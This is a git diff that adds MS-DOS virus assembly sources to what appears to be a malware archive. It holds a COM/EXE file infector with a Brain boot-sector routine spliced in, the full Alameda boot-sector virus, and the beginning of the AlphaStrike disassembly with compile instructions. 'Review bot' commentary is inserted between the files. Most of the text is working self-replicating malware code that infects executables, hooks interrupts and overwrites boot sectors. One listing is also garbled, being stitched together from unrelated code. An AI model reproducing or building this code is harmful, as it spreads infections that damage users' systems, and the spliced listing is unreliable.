+ and al,8 ; volume label?
+ cmp al,8 ; yes?
+ je dolabel ; then change it!
+ add si,20h ; go to next directory entry
+ dec entrycount
+ jnz findlabel ; loop back
+ stc ; Error! 
+ retn
+ db 8Bh
+dolabel:
+ mov bx,[di] ; offset a_data
+ xor bx,tempsave3 ; bx = 53Ah
+ mov tempsave3,si ; si->direntry
+ cli
+ mov ax,ss
+ mov tempsave1,ax
+ mov tempsave2,sp
+ mov ax,cs
+ mov ss,ax
+ mov sp,tempsave3
+ add sp,0Ch ;->reserved area
+ mov cl,51h
+ add dx,444Ch
+ mov di,2555h
+ mov cx,0C03h
+ repe cmpsw
+ mov ax,0B46h
+ mov cx,3
+ rol ax,cl ; ax = 5A30h
+ mov tempsave3,ax
+ mov cx,5
+ mov dx,8
+ sub tempsave3,5210h ; 820h
+ push tempsave3 ; store attributes/reserved
+; I haven't commented the remainder of this procedure.
+; It basically changes the volume label to read "(c) Brain"
+
+; Comment mode OFF
+
+dowhatever:
+ mov ah,[bx] ; 5a3h
+ inc bx
+ mov dl,ah
+ shl dl,1
+ jc dowhatever
+searchstuff:
+ mov dl,[bx] ; dl=C2h
+ inc bx ; bx=53Eh
+ mov al,dl
+ shl dl,1
+ jc searchstuff
+ add ax,1D1Dh
+ push ax
+ inc tempsave3
+ db 73h, 01h ; jnc $+3
+ db 0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2
+ xchg bp,ax
+ add al,0A1h
+ xchg bx,ax
+ add al,8Eh
+ sar bl,1
+ add dh,[bp+si]
+ clc
+ ret
+ ;db 95h, 04h,0A1h, 93h, 04h, 8Eh
+ ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h
+
+; Comment mode ON
+
+readroot:
+ mov r_or_w_root,2 ; set action code
+ jmp short do_rw_root ; easier to do w/
+ nop ; mov ah, 2
+writeroot:
+ mov r_or_w_root,3
+ jmp short do_rw_root ; this is somewhat useless
+ nop
+do_rw_root:
+ mov dh,0 ; head 0
+ mov dl,curdrive
+ mov cx,6 ; sector 6
+ mov ah,r_or_w_root
+ mov al,4 ; 4 sectors
+ mov bx,offset readbuffer
+ call doint13h
+ jc exit_rw_root ; quit on error
+ mov cx,1
+ mov dh,1 ; head 1
+ mov ah,r_or_w_root
+ mov al,3
+ add bx,800h
+ call doint13h
+
+exit_rw_root:
+ retn
+
+doint13h:
+ mov tempsave1,ax
+ mov tempsave2,bx
+ mov tempsave3,cx
+ mov tempsave4,dx
+ mov cx,4
+
+doint13hloop:
+ push cx
+ mov ah,0 ; Reset disk
+ int 6Dh
+ jc errordoingint13h
+ mov ax,tempsave1
+ mov bx,tempsave2
+ mov cx,tempsave3
+ mov dx,tempsave4
+ int 6Dh ; int 13h
+ jnc int13hsuccess
+errordoingint13h:
+ pop cx
+ loop doint13hloop
+
+ stc ; indicate error
+ retn 
+int13hsuccess:
+ pop cx
+ retn
+
+ db 0, 0, 0
+; Part 4 of the virus starts here
+tempstorecx dw 3
+readwritecurrentdata dw 301h
+
+writevirus:
+ call FATManip
+ jc exitwritevirus
+ mov cursector,1
+ mov curhead,0
+ mov bx,offset readbuffer
+ call readcurrent
+ mov bx,offset readbuffer
+ mov ax,firstsector
+ mov cursector,ax
+ mov ah,firsthead
+ mov curhead,ah
+ call writecurrent
+ call calcnextsector
+ mov cx,5
+ mov bx,200h
+writeanothersector:
+ mov tempstorecx,cx
+ call writecurrent
+ call calcnextsector
+ add bx,200h
+ mov cx,tempstorecx
+ loop writeanothersector
+
+ mov curhead,0
+ mov cursector,1
+ mov bx,0
+ call writecurrent
+ clc ; indicate success
+exitwritevirus:
+ retn
+
+
+readcurrent:
+ mov readwritecurrentdata,201h
+ jmp short doreadwrite
+ nop
+writecurrent:
+ mov readwritecurrentdata,301h
+ jmp short doreadwrite ; This is pointless.
+ nop
+doreadwrite:
+ push bx
+ mov cx,4
+
+tryreadwriteagain:
+ push cx
+ mov dh,curhead
+ mov dl,curdrive
+ mov cx,cursector
+ mov ax,readwritecurrentdata ; read or write?
+ int 6Dh ; int 13h
+ jnc readwritesuccessful
+ mov ah,0 ; reset disk
+ int 6Dh ; int 13h
+ pop cx
+ loop tryreadwriteagain
+
+ pop bx
+ pop bx
+ stc ; Indicate error
+ retn
+readwritesuccessful:
+ pop cx
+ pop bx
+ retn
+
+
+calcnextsector:
+ inc byte ptr cursector ; next sector
+ cmp byte ptr cursector,0Ah
+ jne donecalculate ; finished calculations
+ mov byte ptr cursector,1 ; clear sector #
+ inc curhead ; and go to next head
+ cmp curhead,2 ; if not too large,
+ jne donecalculate ; we are done
+ mov curhead,0 ; otherwise clear head #
+ inc byte ptr cursector+1 ; and advance cylinder
+donecalculate:
+ retn
+
+ db 64h, 74h, 61h
+
+; read buffer starts here
+; insert your favorite boot block below... 
+readbuffer:
+ jmp exit_virus
+
+creator db '[Z10]',0 ; Mass Produced Code Generator
+virusname db '[Arachnyphobia]',0
+author db 'Abraxas',0
+
+infect_mask:
+ mov ah,4eh ; find first file
+ mov cx,7 ; any attribute
+findfirstnext:
+ int 21h ; DS:DX points to mask
+ jc exit_infect_mask ; No mo files found
+
+ mov al,0h ; Open read only
+ call open
+
+ mov ah,3fh ; Read file to buffer
+ lea dx,[bp+buffer] ; @ DS:DX
+ mov cx,1Ah ; 1Ah bytes
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ cmp word ptr [bp+buffer],'ZM'; EXE?
+ jz checkEXE ; Why yes, yes it is!
+checkCOM:
+ mov ax,word ptr [bp+newDTA+35] ; Get tail of filename
+ cmp ax,'DN' ; Ends in ND? (commaND)
+ jz find_next
+
+ mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
+ cmp ax,12000 ; Is it too small?
+ jb find_next
+
+ cmp ax,65535-(endheap-decrypt) ; Is it too large?
+ ja find_next
+
+ mov bx,word ptr [bp+buffer+1]; get jmp location
+ add bx,heap-decrypt+3 ; Adjust for virus size
+ cmp ax,bx
+ je find_next ; already infected
+ jmp infect_com
+checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? 
+ jnz infect_exe
+find_next:
+ mov ah,4fh ; find next file
+ jmp short findfirstnext
+exit_infect_mask: ret
+
+infect_exe:
+ les ax, dword ptr [bp+buffer+14h] ; Save old entry point
+ mov word ptr [bp+jmpsave2], ax
+ mov word ptr [bp+jmpsave2+2], es
+
+ les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
+ mov word ptr [bp+stacksave2], es
+ mov word ptr [bp+stacksave2+2], ax
+
+ mov ax, word ptr [bp+buffer + 8] ; Get header size
+ mov cl, 4 ; convert to bytes
+ shl ax, cl
+ xchg ax, bx
+
+ les ax, [bp+offset newDTA+26]; Get file size
+ mov dx, es ; to DX:AX
+ push ax
+ push dx
+
+ sub ax, bx ; Subtract header size from
+ sbb dx, 0 ; file size
+
+ mov cx, 10h ; Convert to segment:offset
+ div cx ; form
+
+ mov word ptr [bp+buffer+14h], dx ; New entry point
+ mov word ptr [bp+buffer+16h], ax
+
+ mov word ptr [bp+buffer+0Eh], ax ; and stack
+ mov word ptr [bp+buffer+10h], id
+
+ pop dx ; get file length
+ pop ax
+
+ add ax, heap-decrypt ; add virus size
+ adc dx, 0
+
+ mov cl, 9
+ push ax
+ shr ax, cl
+ ror dx, cl
+ stc
+ adc dx, ax
+ pop ax
+ and ah, 1 ; mod 512
+
+ mov word ptr [bp+buffer+4], dx ; new file size
+ mov word ptr [bp+buffer+2], ax
+
+ push cs ; restore ES
+ pop es
+
+ push word ptr [bp+buffer+14h] ; needed later
+ mov cx, 1ah
+ jmp short finishinfection
+infect_com: ; ax = filesize
+ mov cx,3
+ sub ax,cx
+ lea si,[bp+offset buffer]
+ lea di,[bp+offset save3]
+ movsw
+ movsb
+ mov byte ptr [si-3],0e9h
+ mov word ptr [si-2],ax
+ add ax,103h
+ push ax ; needed later
+finishinfection:
+ push cx ; Save # bytes to write
+ xor cx,cx ; Clear attributes
+ call attributes ; Set file attributes
+
+ mov al,2
+ call open
+
+ mov ah,40h ; Write to file
+ lea dx,[bp+buffer] ; Write from buffer
+ pop cx ; cx bytes
+ int 21h
+
+ mov ax,4202h ; Move file pointer
+ xor cx,cx ; to end of file
+ cwd ; xor dx,dx
+ int 21h
+
+get_encrypt_value:
+ mov ah,2ch ; Get current time
+ int 21h ; dh=sec,dl=1/100 sec
+ or dx,dx ; Check if encryption value = 0
+ jz get_encrypt_value ; 
Get another if it is
+ mov [bp+decrypt_value],dx ; Set new encryption value
+ lea di,[bp+code_store]
+ mov ax,5355h ; push bp,push bx
+ stosw
+ lea si,[bp+decrypt] ; Copy encryption function
+ mov cx,startencrypt-decrypt ; Bytes to move
+ push si ; Save for later use
+ push cx
+ rep movsb
+
+ xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub
+
+ lea si,[bp+write] ; Copy writing function
+ mov cx,endwrite-write ; Bytes to move
+ rep movsb
+ pop cx
+ pop si
+ pop dx ; Entry point of virus
+ push di
+ push si
+ push cx
+ rep movsb ; Copy decryption function
+ mov ax,5b5dh ; pop bx,pop bp
+ stosw
+ mov al,0c3h ; retn
+ stosb
+
+ add dx,offset startencrypt - offset decrypt ; Calculate new
+ mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
+ call code_store ; decryption
+ pop cx
+ pop di
+ pop si
+ rep movsb ; Restore decryption function
+
+ mov ax,5701h ; Restore creation date/time
+ mov cx,word ptr [bp+newDTA+16h] ; time
+ mov dx,word ptr [bp+newDTA+18h] ; date
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ mov ch,0
+ mov cl,byte ptr [bp+newDTA+15h] ; Restore original
+ call attributes ; attributes
+
+ dec byte ptr [bp+numinfec] ; One mo infection
+ jnz mo_infections ; Not enough
+ pop ax ; remove call from stack
+ jmp done_infections
+mo_infections: jmp find_next
+
+open:
+ mov ah,3dh
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ xchg ax,bx
+ ret
+
+attributes:
+ mov ax,4301h ; Set attributes to cx
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ ret
+
+write:
+ pop bx ; Restore file handle
+ pop bp ; Restore relativeness
+ mov ah,40h ; Write to file
+ lea dx,[bp+decrypt] ; Concatenate virus
+ mov cx,heap-decrypt ; # bytes to write
+ int 21h
+ push bx
+ push bp
+endwrite:
+
+int24: ; New int 24h (error) handler
+ mov al,3 ; Fail call
+ iret ; Return control
+
+exe_mask db '*.exe',0
+com_mask db '*.com',0
+dot_dot db '..',0
+heap: ; Variables not in code
+; The following code is the buffer for the write function
+code_store: 
db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
+oldint24 dd ? ; Storage for old int 24h handler
+backslash db ?
+origdir db 64 dup (?) ; Current directory buffer
+newDTA db 43 dup (?) ; Temporary DTA
+numinfec db ? ; Infections this run
+buffer db 1ah dup (?) ; read buffer
+endheap: ; End of virus
+end entry_point
diff --git a/MSDOS/Virus.MSDOS.Unknown.alemeda.asm b/MSDOS/Virus.MSDOS.Unknown.alemeda.asm
new file mode 100644
index 00000000..287ade7e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.alemeda.asm
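Review bot: The three-line header records only the Phalcon/Skism generator and skeleton.cfg, yet from `activate:` onward the file switches to `org 0` and a second, unrelated listing (the `(c) 1986 Brain` strings, the `int 6Dh` calls through a relocated INT 13h vector, and the `; Part 2/3/4 of the virus` markers), with `readbuffer:` doing double duty as that listing's buffer label and as the `jmp exit_virus` return into the generated code. For analysts who classify this sample by family and by signature, a header line stating that the activation body is a Brain boot-sector listing spliced into the generated COM/EXE infector would be worth adding, for example `; NOTE: code after activate: is a Brain boot-sector listing, not generator output`. Whether the combined file ever assembled as a unit cannot be told from the text alone (the `; FINISH THIS!` and `; Comment mode OFF` notes suggest it may not have), so the header note should say that too rather than leave the reader to infer it.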
@@ -0,0 +1,381 @@
+;-----------------------------------------------------------------------;
+; This virus is of the "FLOPPY ONLY" variety. ;
+; It replicates to the boot sector of a floppy disk and when it gains control
+; it will move itself to upper memory. It redirects the keyboard ;
+; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
+; it will attempt to infect any floppy it finds in drive A:. ;
+; It keeps the real boot sector at track 39, sector 8, head 0 ;
+; It does not map this sector bad in the fat (unlike the Pakistani Brain)
+; and should that area be used by a file, the virus ;
+; will die. It also contains no anti detection mechanisms as does the ;
+; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
+; sector 9 because this is common to all floppy formats both single ;
+; sided and double sided. It does not contain any malevolent TROJAN ;
+; HORSE code. It does appear to contain a count of how many times it ;
+; has infected other diskettes although this is harmless and the count ;
+; is never accessed. ;
+; ;
+; Things to note about this virus: ;
+; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
+; is its primary (only for that matter) means of reproduction to other ;
+; floppy diskettes. The only way to remove it from an infected system ;
+; is to turn the machine off and reboot an uninfected copy of DOS. ;
+; It is even resident when no floppy is booted but BASIC is loaded ;
+; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
+; it activates and infectes the floppy from which the user is ;
+; attempting to boot. ;
+; ;
+; Also note that because of the POP CS command to pass control to ;
+; its self in upper memory, this virus does not to work on 80286 ;
+; machines (because this is not a valid 80286 instruction). ;
+; ;
+; The Norton Utilities can be used to identify infected diskettes by ;
+; looking at the boot sector and the DOS SYS utility can be used to ;
+; remove it (unlike the Pakistani Brain). ;
+;-----------------------------------------------------------------------;
+ ;
+ ORG 7C00H ;
+ ;
+TOS LABEL WORD ;TOP OF STACK
+;-----------------------------------------------------------------------;
+; 1. Find top of memory and copy ourself up there. (keeping same offset);
+; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
+; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
+; 4. Jump to ourself at top of memory ;
+; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
+;-----------------------------------------------------------------------;
+BEGIN: CLI ;INITIALIZE STACK
+ XOR AX,AX ;
+ MOV SS,AX ;
+ MOV SP,offset TOS ;
+ STI ;
+ ;
+ MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
+ MOV DS,BX ;
+ MOV AX,[0013H] ;
+ MUL BX ;
+ SUB AX,07E0H ; (7C00H+512)/16
+ MOV ES,AX ;
+ ;
+ PUSH CS ;DS = CS
+ POP DS ;
+ ;
+ CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
+ JNE B_10 ;
+ DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
+ ;
+B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
+ MOV DI,SI ;
+ MOV CX,512 ;
+ CLD ;
+ REP MOVSB ;
+ ;
+ MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
+ MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
+ MOV CX,128 ;
+ REP MOVSB ;
+ ;
+ CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ ;
+ PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
+ NOP
+ ;
+ PUSH DS ;DS=0 ; ES = DS
+ POP ES ;
+ ;
+ MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
+ MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
+ MOV CX,2708H ; TRACK 40, SECTOR 8
+ MOV AX,0201H ; READ SECTOR
+ INT 13H ; (common to 8/9 sect. 1/2 sided!)
+ JB $ ; HANG IF ERROR
+ ;
+ JMP JMP_BOOT ;JMP 0000:7C00
+ ;
+;-----------------------------------------------------------------------;
+; SAVE THEN REDIRECT INT 9 VECTOR ;
+; ;
+; ON ENTRY: DS = 0 ;
+; ES = WHERE TO SAVE OLD_09 & (HI) ;
+; WHERE NEW_09 IS (HI) ;
+;-----------------------------------------------------------------------;
+PUT_NEW_09: ;
+ DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
+ ;
+ MOV SI,9*4 ;COPY INT 9 VECTOR TO
+ MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
+ MOV CX,0004 ;
+ ;
+ CLI ;
+ REP MOVSB ;
+ MOV Word Ptr [9*4],offset NEW_09
+ MOV [(9*4)+2],ES ;
+ STI ;
+ ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
+;-----------------------------------------------------------------------;
+ACK_KEYBD: ;
+ IN AL,61H ;RESET KEYBOARD THEN CONTINUE
+ MOV AH,AL ;
+ OR AL,80H ;
+ OUT 61H,AL ;
+ XCHG AL,AH ;
+ OUT 61H,AL ;
+ JMP RBOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
+; REASON UNKNOWN ;
+;-----------------------------------------------------------------------;
+TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
+ DB 27H,0,2,2 ; (CURRENTLY NOT USED)
+ DB 27H,0,3,2 ;
+ DB 27H,0,4,2 ;
+ DB 27H,0,5,2 ;
+ DB 27H,0,6,2 ;
+ DB 27H,0,7,2 ;
+ DB 27H,0,8,2 ;
+ ;
+;A7C9A LABEL BYTE ;
+ DW 00024H ;NOT USED
+ DB 0ADH ;
+ DB 07CH ;
+ DB 0A3H ;
+ DW 00026H ;
+ ;
+;L7CA1: ;
+ POP CX ;NOT USED
+ POP DI ;
+ POP SI ;
+ POP ES ;
+ POP DS ;
+ POP AX ;
+ POPF ;
+ JMP 1111:1111 ;
+ ;
+;-----------------------------------------------------------------------;
+; IF ALT & CTRL & DEL THEN ... ;
+; IF ALT & CTRL & ? THEN ... ;
+;-----------------------------------------------------------------------;
+NEW_09: PUSHF ;
+ STI ;
+ ;
+ PUSH AX ;
+ PUSH BX ;
+ PUSH DS ;
+ ;
+ PUSH CS ;DS=CS
+ POP DS ;
+ ;
+ MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
+ IN AL,60H ;GET SCAN CODE
+ MOV AH,AL ;SAVE IN AH
+ AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
+ ;
+ CMP AL,1DH ;IS IT A [CTRL]...
+ JNE N09_10 ;...JUMP IF NO
+ MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
+ JMP N09_30 ;
+ ;
+N09_10: CMP AL,38H ;IS IT AN [ALT]...
+ JNE N09_20 ;...JUMP IF NO
+ MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
+ JMP N09_30 ;
+ ;
+N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
+ JNE N09_30 ;...JUMP IF NO
+ ;
+ CMP AL,17H ;IF [I]...
+ JE N09_X0 ;...JUMP IF YES
+ CMP AL,53H ;IF [DEL]...
+ JE ACK_KEYBD ;...JUMP IF YES
+ ;
+N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
+ ;
+N09_90: POP DS ;
+ POP BX ;
+ POP AX ;
+ POPF ;
+ ;
+ DB 0EAH ;JMP F000:E987
+OLD_09 DW ? ;
+ DW 0F000H ;
+ ;
+N09_X0: JMP N09_X1 ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
+ MOV AX,0800H ;AL=0, AH=DELAY ARG
+ OUT DX,AL ;
+ CALL DELAY ;
+ MOV [ALT_CTRL],AX ;AX=0 ;
+ ;
+ MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
+ INT 10H ;
+ MOV AH,2 ;SET CURSOR POS 0,0
+ XOR DX,DX ;
+ MOV BH,DH ; PAGE 0
+ INT 10H ;
+ ;
+ MOV AH,1 ;SET CURSOR TYPE
+ MOV CX,0607H ;
+ INT 10H ;
+ ;
+ MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
+ CALL DELAY ;
+ ;
+ CLI ;
+ OUT 20H,AL ;SEND EOI TO INT CONTROLLER
+ ;
+ MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
+ MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
+ MOV SI,offset BEGIN - 128 ;
+ MOV CX,128 ;
+ CLD ;
+ REP MOVSB ;
+ ;
+ MOV DS,CX ;CX=0 ;DS=0
+ ;
+ MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
+ MOV [(19H*4)+2],CS ;
+ ;
+ MOV AX,0040H ;DS = ROM DATA AREA
+ MOV DS,AX ;
+ ;
+ MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
+ INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
+ ;
+ PUSH DS ;IF BIOS F000:E502 == 21E4...
+ MOV AX,0F000H ;
+ MOV DS,AX ;
+ CMP Word Ptr [0E502H],21E4H ;
+ POP DS ;
+ JE R_90 ;
+ INT 19H ; IF NOT...REBOOT
+ ;
+R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
+ ;
+;-----------------------------------------------------------------------;
+; REBOOT INT VECTOR ;
+;-----------------------------------------------------------------------;
+NEW_19: XOR AX,AX ;
+ ;
+ MOV DS,AX ;DS=0
+ MOV AX,[0410] ;AX=EQUIP FLAG
+ TEST AL,1 ;IF FLOPPY DRIVES ...
+ JNZ N19_20 ;...JUMP
+N19_10: PUSH CS ;ELSE ES=CS
+ POP ES ;
+ CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ INT 18H ;LOAD BASIC
+ ;
+N19_20: MOV CX,0004 ;RETRY COUNT = 4
+ ;
+N19_22: PUSH CX ;
+ MOV AH,00 ;RESET DISK
+ INT 13 ;
+ JB N19_81 ;
+ MOV AX,0201 ;READ BOOT SECTOR
+ PUSH DS ;
+ POP ES ;
+ MOV BX,offset BEGIN ;
+ MOV CX,1 ;TRACK 0, SECTOR 1
+ INT 13H ;
+N19_81: POP CX ;
+ JNB N19_90 ;
+ LOOP N19_22 ;
+ JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection segment. ;
+;-----------------------------------------------------------------------;
+N19_90: CMP DI,3456 ;IF NOT FLAG SET...
+ JNZ RE_INFECT ;...RE INFECT
+ ;
+JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
+ JMP 0000:7C00H ;
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection Segment. ;
+;-----------------------------------------------------------------------;
+RE_INFECT: ;
+ MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
+ MOV CX,00E6H ; OURSELF
+ MOV DI,SI ;
+ PUSH CS ;
+ POP ES ;
+ CLD ;
+ REPE CMPSB ;
+ JE RI_12 ;IF NOT EQUAL...
+ ;
+ INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
+ ;
+;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
+ MOV BX,offset TABLE ;FORMAT INFO
+ MOV DX,0000 ;DRIVE A: HEAD 0
+ MOV CH,40-1 ;TRACK 39
+ MOV AH,5 ;FORMAT
+ JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
+ ;
+; <<< NO EXECUTION PATH TO HERE >>> ;
+ JB RI_80 ;
+ ;
+;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
+RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
+ MOV BX,offset BEGIN ;TRACK 40H
+ MOV CL,8 ;SECTOR 8
+ MOV AX,0301H ;WRITE 1 SECTOR
+ INT 13H ;
+ ;
+ PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
+ POP ES ;
+ JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
+ ;
+ MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
+ MOV AX,0301 ;
+ INT 13H ;
+ JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
+ ;
+RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
+ INT 19H ;...FLAG AND REBOOT
+ ;
+RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
+ JMP JMP_BOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
+ ;
+ MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
+ MOV BX,0040H ;
+ MOV DS,BX ;
+ MOV [0072H],AX ; 0040:0072 = RESET FLAG
+ JMP N09_90 ;
+ ;
+;-----------------------------------------------------------------------;
+; DELAY ;
+; ;
+; ON ENTRY AH:CX = LOOP COUNT ;
+;-----------------------------------------------------------------------;
+DELAY: SUB CX,CX ;
+D_01: LOOP $ ;
+ SUB AH,1 ;
+ JNZ D_01 ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+A7DF4 DB 27H,00H,8,2
+
+COUNTER_1 DW 001CH
+ALT_CTRL DW 0
+A7DFC DB 27H,0,8,2
+
\ No newline at end of file
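Review bot: The track comments in this listing contradict each other: the header and `TABLE` say track 39, `MOV CX,2708H ; TRACK 40, SECTOR 8` says 40, and `MOV BX,offset BEGIN ;TRACK 40H` says 40h (64). CH=27h is cylinder 39 in the BIOS's 0-based numbering, the same track that `MOV CH,40-1 ;TRACK 39` and the "WRITE REAL BOOT SECTOR AT TRACK 39" comment refer to, so the two stray comments should read `; CYLINDER 39 (0-BASED), SECTOR 8` and `; CYLINDER 39, SEE HEADER`. The listing is also inconsistent about hex suffixes in NEW_19 and RE_INFECT — `INT 13`, `MOV AX,0201`, `MOV AX,0301`, `CMP DI,3456` and `MOV AX,[0410]` lack the H that `INT 13H`, `0201H`, `0301H` and `3456H` carry elsewhere — and MASM reads unsuffixed literals as decimal, so a reader cross-checking against a binary should treat these as transcription slips in the archived source rather than as behaviour. Finally, the header describes a `POP CS` transfer to the high copy, but the line after `PUSH ES ;ES=HI` in this listing is a bare `NOP`, so that paragraph no longer matches the code shown.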
diff --git a/MSDOS/Virus.MSDOS.Unknown.alpha.asm b/MSDOS/Virus.MSDOS.Unknown.alpha.asm
new file mode 100644
index 00000000..296567c9
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.alpha.asm
@@ -0,0 +1,890 @@
+; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch.
+; there are no comments. there are no need for comments unless you are lame.
+;
+; GREETZ R LAYME SO I WEEL NOT DO NE.
+;
+; 2 COMPYLE:
+; tasm /m alpha.asm (EYE UZED FORE DOT SOMETHING)
+; tlink alpha.obj (umm... 2.xx)
+; exe2bin alpha.exe alpha.com
+;
+; i am contactable via retro@pcscav.com
+
+.model tiny
+.code
+.286
+
+virus_start: mov di, 0F242h
+ mov si, word ptr ds:[2h]
+ sub si, di
+ cmp si, 1000h
+ call getip
+getip: mov bp, sp
+ mov bp, [bp]
+ cld
+ mov ax, 4458h
+ int 21h
+ jb checkifdosinhma
+ mov ds, es:[bx+0Eh]
+ mov si, 0Bh
+ jmp addressatSI
+sysentry: pushf
+ pusha
+ push ds
+ push es
+ jmp virus_start
+checkifdosinhma:mov ax, 3306h
+ int 21h
+ cmp al, 6
+ jnz checkdosversion
+ cmp dh, 10h
+ jnz go_abortinstall
+ mov ax, 0FFC4h
+ jmp compareints
+checkdosversion:mov ah, 30h
+ int 21h
+ xchg al, ah
+ cmp ax, 31Eh
+ mov ax, 1Bh
+ jb go_abortinstall
+compareints: mov cx, 0Ah
+ mov ds, cx
+ mov es, cx
+ mov si, 14h
+ mov bx, si
+ lea di, [bx+si]
+ cmpsw
+ jnz abortinstall
+ cmpsw
+go_abortinstall:jnz abortinstall
+ lds si, [bx]
+ add si, ax
+ cmp al, 1Bh
+ jz checkifkernelpatched
+ mov si, [si+8]
+addressatSI: lds si, [si]
+checkifkernelpatched:
+ cmp byte ptr [si], 0EAh
+ jz abortinstall
+ mov cs:[bp+(kernaladdress )-getip], si
+ mov cs:[bp+(kernaladdress+2)-getip], ds
+ call getmemory
+ jnz abortinstall
+ lea si, [bp+(virus_start)-getip]
+ push cs
+ pop ds
+ mov es, cx
+ mov cx, offset header
+ rep movsb
+ sub ax, ax
+ mov cl, 0C0h
+ rep stosb
+ mov di, offset newint21
+ mov es:[di+1], al
+ lds si, ds:[bp+(kernaladdress)-getip]
+ mov ax, [si]
+ mov cl, 6Ch
+ mov bx, 6
+ cmp al, 0FAh
+ jz patchkernel
+ mov bl, 7
+ cmp al, 2Eh
+ jz patchkernel
+ mov cl, 69h
+ mov bl, 5
+ cmp al, 80h
+ jnz abortinstall
+patchkernel: mov es:[di+savecmp-newint21], cl
+ add bx, si
+ mov es:[di+kernaladdress-newint21], bx
+ mov byte ptr [si], 0EAh
+ mov [si+1], di
+ mov [si+3], es
+abortinstall: pop ax
+ sub si, si
+ mov ax, ss
+ cmp ah, 90h
+ jz restoresys
+ mov ah, 62h
+ int 21h
+ push bx
+ mov ds, bx
+ mov cx, [si+2Ch]
+ jcxz restorehost
+ mov ds, cx
+ mov ch, 8
+findcomspec: cmp word ptr [si], 4F43h
+ jnz keeplooking
+ cmp word ptr [si+6], 3D43h
+ jz foundcomspec
+keeplooking: inc si
+ loop findcomspec
+ jmp restorehost
